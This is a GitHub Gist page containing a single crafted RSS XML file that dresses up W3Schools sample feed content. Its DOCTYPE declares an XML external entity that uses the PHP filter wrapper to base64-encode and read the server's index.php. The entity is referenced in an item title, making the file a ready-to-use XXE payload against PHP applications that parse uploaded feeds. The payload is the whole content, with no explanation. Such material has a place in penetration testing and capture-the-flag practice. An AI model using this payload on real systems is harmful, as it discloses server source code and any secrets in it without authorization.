Last active
May 11, 2022 03:11
-
-
Save johnsaigle/e15857fb091ee14d688ce7105c5b735e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <!DOCTYPE foo [ | |
| <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" > ]> | |
| <rss version="2.0"> | |
| <channel> | |
| <title>W3Schools Home Page</title> | |
| <link>https://www.w3schools.com</link> | |
| <description>Free web building tutorials</description> | |
| <item> | |
| <title>&xxe;</title> | |
| <link>https://www.w3schools.com/xml/xml_rss.asp</link> | |
| <description>%xxe;</description> | |
| </item> | |
| </channel> | |
| </rss> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment